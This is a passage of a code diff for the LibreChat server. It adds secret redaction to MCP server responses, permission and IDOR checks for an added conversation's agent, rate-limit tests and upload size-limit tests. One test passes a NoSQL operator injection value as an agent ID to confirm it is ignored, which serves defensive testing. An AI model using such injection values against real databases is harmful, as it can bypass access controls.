expect(mockRes.status).not.toHaveBeenCalledWith(403);
const response = mockRes.json.mock.calls[0][0];
expect(response.name).toBe('Renamed Agent');
});
});
}); });

View file

@ -7,9 +7,11 @@
*/ */
const { logger } = require('@librechat/data-schemas'); const { logger } = require('@librechat/data-schemas');
const { const {
MCPErrorCodes,
redactServerSecrets,
redactAllServerSecrets,
isMCPDomainNotAllowedError, isMCPDomainNotAllowedError,
isMCPInspectionFailedError, isMCPInspectionFailedError,
MCPErrorCodes,
} = require('@librechat/api'); } = require('@librechat/api');
const { Constants, MCPServerUserInputSchema } = require('librechat-data-provider'); const { Constants, MCPServerUserInputSchema } = require('librechat-data-provider');
const { cacheMCPServerTools, getMCPServerTools } = require('~/server/services/Config'); const { cacheMCPServerTools, getMCPServerTools } = require('~/server/services/Config');
@ -181,10 +183,8 @@ const getMCPServersList = async (req, res) => {
return res.status(401).json({ message: 'Unauthorized' }); return res.status(401).json({ message: 'Unauthorized' });
} }
// 2. Get all server configs from registry (YAML + DB)
const serverConfigs = await getMCPServersRegistry().getAllServerConfigs(userId); const serverConfigs = await getMCPServersRegistry().getAllServerConfigs(userId);
return res.json(redactAllServerSecrets(serverConfigs));
return res.json(serverConfigs);
} catch (error) { } catch (error) {
logger.error('[getMCPServersList]', error); logger.error('[getMCPServersList]', error);
res.status(500).json({ error: error.message }); res.status(500).json({ error: error.message });
@ -215,7 +215,7 @@ const createMCPServerController = async (req, res) => {
); );
res.status(201).json({ res.status(201).json({
serverName: result.serverName, serverName: result.serverName,
...result.config, ...redactServerSecrets(result.config),
}); });
} catch (error) { } catch (error) {
logger.error('[createMCPServer]', error); logger.error('[createMCPServer]', error);
@ -243,7 +243,7 @@ const getMCPServerById = async (req, res) => {
return res.status(404).json({ message: 'MCP server not found' }); return res.status(404).json({ message: 'MCP server not found' });
} }
res.status(200).json(parsedConfig); res.status(200).json(redactServerSecrets(parsedConfig));
} catch (error) { } catch (error) {
logger.error('[getMCPServerById]', error); logger.error('[getMCPServerById]', error);
res.status(500).json({ message: error.message }); res.status(500).json({ message: error.message });
@ -274,7 +274,7 @@ const updateMCPServerController = async (req, res) => {
userId, userId,
); );
res.status(200).json(parsedConfig); res.status(200).json(redactServerSecrets(parsedConfig));
} catch (error) { } catch (error) {
logger.error('[updateMCPServer]', error); logger.error('[updateMCPServer]', error);
const mcpErrorResponse = handleMCPError(error, res); const mcpErrorResponse = handleMCPError(error, res);

View file

@ -1,42 +1,144 @@
const { logger } = require('@librechat/data-schemas'); const { logger } = require('@librechat/data-schemas');
const { const {
Constants, Constants,
Permissions,
ResourceType, ResourceType,
SystemRoles,
PermissionTypes,
isAgentsEndpoint, isAgentsEndpoint,
isEphemeralAgentId, isEphemeralAgentId,
} = require('librechat-data-provider'); } = require('librechat-data-provider');
const { checkPermission } = require('~/server/services/PermissionService');
const { canAccessResource } = require('./canAccessResource'); const { canAccessResource } = require('./canAccessResource');
const { getRoleByName } = require('~/models/Role');
const { getAgent } = require('~/models/Agent'); const { getAgent } = require('~/models/Agent');
/** /**
* Agent ID resolver function for agent_id from request body * Resolves custom agent ID (e.g., "agent_abc123") to a MongoDB document.
* Resolves custom agent ID (e.g., "agent_abc123") to MongoDB ObjectId
* This is used specifically for chat routes where agent_id comes from request body
*
* @param {string} agentCustomId - Custom agent ID from request body * @param {string} agentCustomId - Custom agent ID from request body
* @returns {Promise<Object|null>} Agent document with _id field, or null if not found * @returns {Promise<Object|null>} Agent document with _id field, or null if ephemeral/not found
*/ */
const resolveAgentIdFromBody = async (agentCustomId) => { const resolveAgentIdFromBody = async (agentCustomId) => {
// Handle ephemeral agents - they don't need permission checks
// Real agent IDs always start with "agent_", so anything else is ephemeral
if (isEphemeralAgentId(agentCustomId)) { if (isEphemeralAgentId(agentCustomId)) {
return null; // No permission check needed for ephemeral agents return null;
} }
return getAgent({ id: agentCustomId });
return await getAgent({ id: agentCustomId });
}; };
/** /**
* Middleware factory that creates middleware to check agent access permissions from request body. * Creates a `canAccessResource` middleware for the given agent ID
* This middleware is specifically designed for chat routes where the agent_id comes from req.body * and chains to the provided continuation on success.
* instead of route parameters. *
* @param {string} agentId - The agent's custom string ID (e.g., "agent_abc123")
* @param {number} requiredPermission - Permission bit(s) required
* @param {import('express').Request} req
* @param {import('express').Response} res - Written on deny; continuation called on allow
* @param {Function} continuation - Called when the permission check passes
* @returns {Promise<void>}
*/
const checkAgentResourceAccess = (agentId, requiredPermission, req, res, continuation) => {
const middleware = canAccessResource({
resourceType: ResourceType.AGENT,
requiredPermission,
resourceIdParam: 'agent_id',
idResolver: () => resolveAgentIdFromBody(agentId),
});
const tempReq = {
...req,
params: { ...req.params, agent_id: agentId },
};
return middleware(tempReq, res, continuation);
};
/**
* Middleware factory that validates MULTI_CONVO:USE role permission and, when
* addedConvo.agent_id is a non-ephemeral agent, the same resource-level permission
* required for the primary agent (`requiredPermission`). Caches the resolved agent
* document on `req.resolvedAddedAgent` to avoid a duplicate DB fetch in `loadAddedAgent`.
*
* @param {number} requiredPermission - Permission bit(s) to check on the added agent resource
* @returns {(req: import('express').Request, res: import('express').Response, next: Function) => Promise<void>}
*/
const checkAddedConvoAccess = (requiredPermission) => async (req, res, next) => {
const addedConvo = req.body?.addedConvo;
if (!addedConvo || typeof addedConvo !== 'object' || Array.isArray(addedConvo)) {
return next();
}
try {
if (!req.user?.role) {
return res.status(403).json({
error: 'Forbidden',
message: 'Insufficient permissions for multi-conversation',
});
}
if (req.user.role !== SystemRoles.ADMIN) {
const role = await getRoleByName(req.user.role);
const hasMultiConvo = role?.permissions?.[PermissionTypes.MULTI_CONVO]?.[Permissions.USE];
if (!hasMultiConvo) {
return res.status(403).json({
error: 'Forbidden',
message: 'Multi-conversation feature is not enabled',
});
}
}
const addedAgentId = addedConvo.agent_id;
if (!addedAgentId || typeof addedAgentId !== 'string' || isEphemeralAgentId(addedAgentId)) {
return next();
}
if (req.user.role === SystemRoles.ADMIN) {
return next();
}
const agent = await resolveAgentIdFromBody(addedAgentId);
if (!agent) {
return res.status(404).json({
error: 'Not Found',
message: `${ResourceType.AGENT} not found`,
});
}
const hasPermission = await checkPermission({
userId: req.user.id,
role: req.user.role,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
requiredPermission,
});
if (!hasPermission) {
return res.status(403).json({
error: 'Forbidden',
message: `Insufficient permissions to access this ${ResourceType.AGENT}`,
});
}
req.resolvedAddedAgent = agent;
return next();
} catch (error) {
logger.error('Failed to validate addedConvo access permissions', error);
return res.status(500).json({
error: 'Internal Server Error',
message: 'Failed to validate addedConvo access permissions',
});
}
};
/**
* Middleware factory that checks agent access permissions from request body.
* Validates both the primary agent_id and, when present, addedConvo.agent_id
* (which also requires MULTI_CONVO:USE role permission).
* *
* @param {Object} options - Configuration options * @param {Object} options - Configuration options
* @param {number} options.requiredPermission - The permission bit required (1=view, 2=edit, 4=delete, 8=share) * @param {number} options.requiredPermission - The permission bit required (1=view, 2=edit, 4=delete, 8=share)
* @returns {Function} Express middleware function * @returns {Function} Express middleware function
* *
* @example * @example
* // Basic usage for agent chat (requires VIEW permission)
* router.post('/chat', * router.post('/chat',
* canAccessAgentFromBody({ requiredPermission: PermissionBits.VIEW }), * canAccessAgentFromBody({ requiredPermission: PermissionBits.VIEW }),
* buildEndpointOption, * buildEndpointOption,
@ -46,11 +148,12 @@ const resolveAgentIdFromBody = async (agentCustomId) => {
const canAccessAgentFromBody = (options) => { const canAccessAgentFromBody = (options) => {
const { requiredPermission } = options; const { requiredPermission } = options;
// Validate required options
if (!requiredPermission || typeof requiredPermission !== 'number') { if (!requiredPermission || typeof requiredPermission !== 'number') {
throw new Error('canAccessAgentFromBody: requiredPermission is required and must be a number'); throw new Error('canAccessAgentFromBody: requiredPermission is required and must be a number');
} }
const addedConvoMiddleware = checkAddedConvoAccess(requiredPermission);
return async (req, res, next) => { return async (req, res, next) => {
try { try {
const { endpoint, agent_id } = req.body; const { endpoint, agent_id } = req.body;
@ -67,28 +170,13 @@ const canAccessAgentFromBody = (options) => {
}); });
} }
// Skip permission checks for ephemeral agents const afterPrimaryCheck = () => addedConvoMiddleware(req, res, next);
// Real agent IDs always start with "agent_", so anything else is ephemeral
if (isEphemeralAgentId(agentId)) { if (isEphemeralAgentId(agentId)) {
return next(); return afterPrimaryCheck();
} }
const agentAccessMiddleware = canAccessResource({ return checkAgentResourceAccess(agentId, requiredPermission, req, res, afterPrimaryCheck);
resourceType: ResourceType.AGENT,
requiredPermission,
resourceIdParam: 'agent_id', // This will be ignored since we use custom resolver
idResolver: () => resolveAgentIdFromBody(agentId),
});
const tempReq = {
...req,
params: {
...req.params,
agent_id: agentId,
},
};
return agentAccessMiddleware(tempReq, res, next);
} catch (error) { } catch (error) {
logger.error('Failed to validate agent access permissions', error); logger.error('Failed to validate agent access permissions', error);
return res.status(500).json({ return res.status(500).json({

View file

@ -0,0 +1,509 @@
const mongoose = require('mongoose');
const {
ResourceType,
SystemRoles,
PrincipalType,
PrincipalModel,
} = require('librechat-data-provider');
const { MongoMemoryServer } = require('mongodb-memory-server');
const { canAccessAgentFromBody } = require('./canAccessAgentFromBody');
const { User, Role, AclEntry } = require('~/db/models');
const { createAgent } = require('~/models/Agent');
describe('canAccessAgentFromBody middleware', () => {
let mongoServer;
let req, res, next;
let testUser, otherUser;
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
await mongoose.connect(mongoServer.getUri());
});
afterAll(async () => {
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await mongoose.connection.dropDatabase();
await Role.create({
name: 'test-role',
permissions: {
AGENTS: { USE: true, CREATE: true, SHARE: true },
MULTI_CONVO: { USE: true },
},
});
await Role.create({
name: 'no-multi-convo',
permissions: {
AGENTS: { USE: true, CREATE: true, SHARE: true },
MULTI_CONVO: { USE: false },
},
});
await Role.create({
name: SystemRoles.ADMIN,
permissions: {
AGENTS: { USE: true, CREATE: true, SHARE: true },
MULTI_CONVO: { USE: true },
},
});
testUser = await User.create({
email: 'test@example.com',
name: 'Test User',
username: 'testuser',
role: 'test-role',
});
otherUser = await User.create({
email: 'other@example.com',
name: 'Other User',
username: 'otheruser',
role: 'test-role',
});
req = {
user: { id: testUser._id, role: testUser.role },
params: {},
body: {
endpoint: 'agents',
agent_id: 'ephemeral_primary',
},
};
res = {
status: jest.fn().mockReturnThis(),
json: jest.fn(),
};
next = jest.fn();
jest.clearAllMocks();
});
describe('middleware factory', () => {
test('throws if requiredPermission is missing', () => {
expect(() => canAccessAgentFromBody({})).toThrow(
'canAccessAgentFromBody: requiredPermission is required and must be a number',
);
});
test('throws if requiredPermission is not a number', () => {
expect(() => canAccessAgentFromBody({ requiredPermission: '1' })).toThrow(
'canAccessAgentFromBody: requiredPermission is required and must be a number',
);
});
test('returns a middleware function', () => {
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
expect(typeof middleware).toBe('function');
expect(middleware.length).toBe(3);
});
});
describe('primary agent checks', () => {
test('returns 400 when agent_id is missing on agents endpoint', async () => {
req.body.agent_id = undefined;
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(400);
});
test('proceeds for ephemeral primary agent without addedConvo', async () => {
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
expect(res.status).not.toHaveBeenCalled();
});
test('proceeds for non-agents endpoint (ephemeral fallback)', async () => {
req.body.endpoint = 'openAI';
req.body.agent_id = undefined;
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
});
});
describe('addedConvo — absent or invalid shape', () => {
test('calls next when addedConvo is absent', async () => {
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
});
test('calls next when addedConvo is a string', async () => {
req.body.addedConvo = 'not-an-object';
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
});
test('calls next when addedConvo is an array', async () => {
req.body.addedConvo = [{ agent_id: 'agent_something' }];
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
});
});
describe('addedConvo — MULTI_CONVO permission gate', () => {
test('returns 403 when user lacks MULTI_CONVO:USE', async () => {
req.user.role = 'no-multi-convo';
req.body.addedConvo = { agent_id: 'agent_x', endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(403);
expect(res.json).toHaveBeenCalledWith(
expect.objectContaining({ message: 'Multi-conversation feature is not enabled' }),
);
});
test('returns 403 when user.role is missing', async () => {
req.user = { id: testUser._id };
req.body.addedConvo = { agent_id: 'agent_x', endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(403);
});
test('ADMIN bypasses MULTI_CONVO check', async () => {
req.user.role = SystemRoles.ADMIN;
req.body.addedConvo = { agent_id: 'ephemeral_x', endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
expect(res.status).not.toHaveBeenCalled();
});
});
describe('addedConvo — agent_id shape validation', () => {
test('calls next when agent_id is ephemeral', async () => {
req.body.addedConvo = { agent_id: 'ephemeral_xyz', endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
});
test('calls next when agent_id is absent', async () => {
req.body.addedConvo = { endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
});
test('calls next when agent_id is not a string (object injection)', async () => {
req.body.addedConvo = { agent_id: { $gt: '' }, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
});
});
describe('addedConvo — agent resource ACL (IDOR prevention)', () => {
let addedAgent;
beforeEach(async () => {
addedAgent = await createAgent({
id: `agent_added_${Date.now()}`,
name: 'Private Agent',
provider: 'openai',
model: 'gpt-4',
author: otherUser._id,
});
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: otherUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: addedAgent._id,
permBits: 15,
grantedBy: otherUser._id,
});
});
test('returns 403 when requester has no ACL for the added agent', async () => {
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(403);
expect(res.json).toHaveBeenCalledWith(
expect.objectContaining({
message: 'Insufficient permissions to access this agent',
}),
);
});
test('returns 404 when added agent does not exist', async () => {
req.body.addedConvo = {
agent_id: 'agent_nonexistent_999',
endpoint: 'agents',
model: 'gpt-4',
};
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(404);
});
test('proceeds when requester has ACL for the added agent', async () => {
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: testUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: addedAgent._id,
permBits: 1,
grantedBy: otherUser._id,
});
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
expect(res.status).not.toHaveBeenCalled();
});
test('denies when ACL permission bits are insufficient', async () => {
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: testUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: addedAgent._id,
permBits: 1,
grantedBy: otherUser._id,
});
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 2 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(403);
});
test('caches resolved agent on req.resolvedAddedAgent', async () => {
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: testUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: addedAgent._id,
permBits: 1,
grantedBy: otherUser._id,
});
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
expect(req.resolvedAddedAgent).toBeDefined();
expect(req.resolvedAddedAgent._id.toString()).toBe(addedAgent._id.toString());
});
test('ADMIN bypasses agent resource ACL for addedConvo', async () => {
req.user.role = SystemRoles.ADMIN;
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
expect(res.status).not.toHaveBeenCalled();
expect(req.resolvedAddedAgent).toBeUndefined();
});
});
describe('end-to-end: primary real agent + addedConvo real agent', () => {
let primaryAgent, addedAgent;
beforeEach(async () => {
primaryAgent = await createAgent({
id: `agent_primary_${Date.now()}`,
name: 'Primary Agent',
provider: 'openai',
model: 'gpt-4',
author: testUser._id,
});
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: testUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: primaryAgent._id,
permBits: 15,
grantedBy: testUser._id,
});
addedAgent = await createAgent({
id: `agent_added_${Date.now()}`,
name: 'Added Agent',
provider: 'openai',
model: 'gpt-4',
author: otherUser._id,
});
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: otherUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: addedAgent._id,
permBits: 15,
grantedBy: otherUser._id,
});
req.body.agent_id = primaryAgent.id;
});
test('both checks pass when user has ACL for both agents', async () => {
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: testUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: addedAgent._id,
permBits: 1,
grantedBy: otherUser._id,
});
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
expect(res.status).not.toHaveBeenCalled();
expect(req.resolvedAddedAgent).toBeDefined();
});
test('primary passes but addedConvo denied → 403', async () => {
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(403);
});
test('primary denied → 403 without reaching addedConvo check', async () => {
const foreignAgent = await createAgent({
id: `agent_foreign_${Date.now()}`,
name: 'Foreign Agent',
provider: 'openai',
model: 'gpt-4',
author: otherUser._id,
});
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: otherUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: foreignAgent._id,
permBits: 15,
grantedBy: otherUser._id,
});
req.body.agent_id = foreignAgent.id;
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(403);
});
});
describe('ephemeral primary + real addedConvo agent', () => {
let addedAgent;
beforeEach(async () => {
addedAgent = await createAgent({
id: `agent_added_${Date.now()}`,
name: 'Added Agent',
provider: 'openai',
model: 'gpt-4',
author: otherUser._id,
});
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: otherUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: addedAgent._id,
permBits: 15,
grantedBy: otherUser._id,
});
});
test('runs full addedConvo ACL check even when primary is ephemeral', async () => {
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(403);
});
test('proceeds when user has ACL for added agent (ephemeral primary)', async () => {
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: testUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: addedAgent._id,
permBits: 1,
grantedBy: otherUser._id,
});
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
await middleware(req, res, next);
expect(next).toHaveBeenCalled();
expect(res.status).not.toHaveBeenCalled();
});
});
});

View file

@ -48,7 +48,7 @@ const createForkHandler = (ip = true) => {
}; };
await logViolation(req, res, type, errorMessage, forkViolationScore); await logViolation(req, res, type, errorMessage, forkViolationScore);
res.status(429).json({ message: 'Too many conversation fork requests. Try again later' }); res.status(429).json({ message: 'Too many requests. Try again later' });
}; };
}; };

View file

@ -0,0 +1,93 @@
module.exports = {
agents: () => ({ sleep: jest.fn() }),
api: (overrides = {}) => ({
isEnabled: jest.fn(),
resolveImportMaxFileSize: jest.fn(() => 262144000),
createAxiosInstance: jest.fn(() => ({
get: jest.fn(),
post: jest.fn(),
put: jest.fn(),
delete: jest.fn(),
})),
logAxiosError: jest.fn(),
...overrides,
}),
dataSchemas: () => ({
logger: {
debug: jest.fn(),
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
},
createModels: jest.fn(() => ({
User: {},
Conversation: {},
Message: {},
SharedLink: {},
})),
}),
dataProvider: (overrides = {}) => ({
CacheKeys: { GEN_TITLE: 'GEN_TITLE' },
EModelEndpoint: {
azureAssistants: 'azureAssistants',
assistants: 'assistants',
},
...overrides,
}),
conversationModel: () => ({
getConvosByCursor: jest.fn(),
getConvo: jest.fn(),
deleteConvos: jest.fn(),
saveConvo: jest.fn(),
}),
toolCallModel: () => ({ deleteToolCalls: jest.fn() }),
sharedModels: () => ({
deleteAllSharedLinks: jest.fn(),
deleteConvoSharedLink: jest.fn(),
}),
requireJwtAuth: () => (req, res, next) => next(),
middlewarePassthrough: () => ({
createImportLimiters: jest.fn(() => ({
importIpLimiter: (req, res, next) => next(),
importUserLimiter: (req, res, next) => next(),
})),
createForkLimiters: jest.fn(() => ({
forkIpLimiter: (req, res, next) => next(),
forkUserLimiter: (req, res, next) => next(),
})),
configMiddleware: (req, res, next) => next(),
validateConvoAccess: (req, res, next) => next(),
}),
forkUtils: () => ({
forkConversation: jest.fn(),
duplicateConversation: jest.fn(),
}),
importUtils: () => ({ importConversations: jest.fn() }),
logStores: () => jest.fn(),
multerSetup: () => ({
storage: {},
importFileFilter: jest.fn(),
}),
multerLib: () =>
jest.fn(() => ({
single: jest.fn(() => (req, res, next) => {
req.file = { path: '/tmp/test-file.json' };
next();
}),
})),
assistantEndpoint: () => ({ initializeClient: jest.fn() }),
};

View file

@ -0,0 +1,135 @@
const express = require('express');
const request = require('supertest');
const MOCKS = '../__test-utils__/convos-route-mocks';
jest.mock('@librechat/agents', () => require(MOCKS).agents());
jest.mock('@librechat/api', () => require(MOCKS).api({ limiterCache: jest.fn(() => undefined) }));
jest.mock('@librechat/data-schemas', () => require(MOCKS).dataSchemas());
jest.mock('librechat-data-provider', () =>
require(MOCKS).dataProvider({ ViolationTypes: { FILE_UPLOAD_LIMIT: 'file_upload_limit' } }),
);
jest.mock('~/cache/logViolation', () => jest.fn().mockResolvedValue(undefined));
jest.mock('~/cache/getLogStores', () => require(MOCKS).logStores());
jest.mock('~/models/Conversation', () => require(MOCKS).conversationModel());
jest.mock('~/models/ToolCall', () => require(MOCKS).toolCallModel());
jest.mock('~/models', () => require(MOCKS).sharedModels());
jest.mock('~/server/middleware/requireJwtAuth', () => require(MOCKS).requireJwtAuth());
jest.mock('~/server/middleware', () => {
const { createForkLimiters } = jest.requireActual('~/server/middleware/limiters/forkLimiters');
return {
createImportLimiters: jest.fn(() => ({
importIpLimiter: (req, res, next) => next(),
importUserLimiter: (req, res, next) => next(),
})),
createForkLimiters,
configMiddleware: (req, res, next) => next(),
validateConvoAccess: (req, res, next) => next(),
};
});
jest.mock('~/server/utils/import/fork', () => require(MOCKS).forkUtils());
jest.mock('~/server/utils/import', () => require(MOCKS).importUtils());
jest.mock('~/server/routes/files/multer', () => require(MOCKS).multerSetup());
jest.mock('multer', () => require(MOCKS).multerLib());
jest.mock('~/server/services/Endpoints/azureAssistants', () => require(MOCKS).assistantEndpoint());
jest.mock('~/server/services/Endpoints/assistants', () => require(MOCKS).assistantEndpoint());
describe('POST /api/convos/duplicate - Rate Limiting', () => {
let app;
let duplicateConversation;
const savedEnv = {};
beforeAll(() => {
savedEnv.FORK_USER_MAX = process.env.FORK_USER_MAX;
savedEnv.FORK_USER_WINDOW = process.env.FORK_USER_WINDOW;
savedEnv.FORK_IP_MAX = process.env.FORK_IP_MAX;
savedEnv.FORK_IP_WINDOW = process.env.FORK_IP_WINDOW;
});
afterAll(() => {
for (const key of Object.keys(savedEnv)) {
if (savedEnv[key] === undefined) {
delete process.env[key];
} else {
process.env[key] = savedEnv[key];
}
}
});
const setupApp = () => {
jest.clearAllMocks();
jest.isolateModules(() => {
const convosRouter = require('../convos');
({ duplicateConversation } = require('~/server/utils/import/fork'));
app = express();
app.use(express.json());
app.use((req, res, next) => {
req.user = { id: 'rate-limit-test-user' };
next();
});
app.use('/api/convos', convosRouter);
});
duplicateConversation.mockResolvedValue({
conversation: { conversationId: 'duplicated-conv' },
});
};
describe('user limit', () => {
beforeEach(() => {
process.env.FORK_USER_MAX = '2';
process.env.FORK_USER_WINDOW = '1';
process.env.FORK_IP_MAX = '100';
process.env.FORK_IP_WINDOW = '1';
setupApp();
});
it('should return 429 after exceeding the user rate limit', async () => {
const userMax = parseInt(process.env.FORK_USER_MAX, 10);
for (let i = 0; i < userMax; i++) {
const res = await request(app)
.post('/api/convos/duplicate')
.send({ conversationId: 'conv-123' });
expect(res.status).toBe(201);
}
const res = await request(app)
.post('/api/convos/duplicate')
.send({ conversationId: 'conv-123' });
expect(res.status).toBe(429);
expect(res.body.message).toMatch(/too many/i);
});
});
describe('IP limit', () => {
beforeEach(() => {
process.env.FORK_USER_MAX = '100';
process.env.FORK_USER_WINDOW = '1';
process.env.FORK_IP_MAX = '2';
process.env.FORK_IP_WINDOW = '1';
setupApp();
});
it('should return 429 after exceeding the IP rate limit', async () => {
const ipMax = parseInt(process.env.FORK_IP_MAX, 10);
for (let i = 0; i < ipMax; i++) {
const res = await request(app)
.post('/api/convos/duplicate')
.send({ conversationId: 'conv-123' });
expect(res.status).toBe(201);
}
const res = await request(app)
.post('/api/convos/duplicate')
.send({ conversationId: 'conv-123' });
expect(res.status).toBe(429);
expect(res.body.message).toMatch(/too many/i);
});
});
});

View file

@ -0,0 +1,98 @@
const express = require('express');
const request = require('supertest');
const multer = require('multer');
const importFileFilter = (req, file, cb) => {
if (file.mimetype === 'application/json') {
cb(null, true);
} else {
cb(new Error('Only JSON files are allowed'), false);
}
};
/** Proxy app that mirrors the production multer + error-handling pattern */
function createImportApp(fileSize) {
const app = express();
const upload = multer({
storage: multer.memoryStorage(),
fileFilter: importFileFilter,
limits: { fileSize },
});
const uploadSingle = upload.single('file');
function handleUpload(req, res, next) {
uploadSingle(req, res, (err) => {
if (err && err.code === 'LIMIT_FILE_SIZE') {
return res.status(413).json({ message: 'File exceeds the maximum allowed size' });
}
if (err) {
return next(err);
}
next();
});
}
app.post('/import', handleUpload, (req, res) => {
res.status(201).json({ message: 'success', size: req.file.size });
});
app.use((err, _req, res, _next) => {
res.status(400).json({ error: err.message });
});
return app;
}
describe('Conversation Import - Multer File Size Limits', () => {
describe('multer rejects files exceeding the configured limit', () => {
it('returns 413 for files larger than the limit', async () => {
const limit = 1024;
const app = createImportApp(limit);
const oversized = Buffer.alloc(limit + 512, 'x');
const res = await request(app)
.post('/import')
.attach('file', oversized, { filename: 'import.json', contentType: 'application/json' });
expect(res.status).toBe(413);
expect(res.body.message).toBe('File exceeds the maximum allowed size');
});
it('accepts files within the limit', async () => {
const limit = 4096;
const app = createImportApp(limit);
const valid = Buffer.from(JSON.stringify({ title: 'test' }));
const res = await request(app)
.post('/import')
.attach('file', valid, { filename: 'import.json', contentType: 'application/json' });
expect(res.status).toBe(201);
expect(res.body.message).toBe('success');
});
it('rejects at the exact boundary (limit + 1 byte)', async () => {
const limit = 512;
const app = createImportApp(limit);
const boundary = Buffer.alloc(limit + 1, 'a');
const res = await request(app)
.post('/import')
.attach('file', boundary, { filename: 'import.json', contentType: 'application/json' });
expect(res.status).toBe(413);
});
it('accepts a file just under the limit', async () => {
const limit = 512;
const app = createImportApp(limit);
const underLimit = Buffer.alloc(limit - 1, 'b');
const res = await request(app)
.post('/import')
.attach('file', underLimit, { filename: 'import.json', contentType: 'application/json' });
expect(res.status).toBe(201);
});
});
});

View file

@ -1,109 +1,24 @@
const express = require('express'); const express = require('express');
const request = require('supertest'); const request = require('supertest');
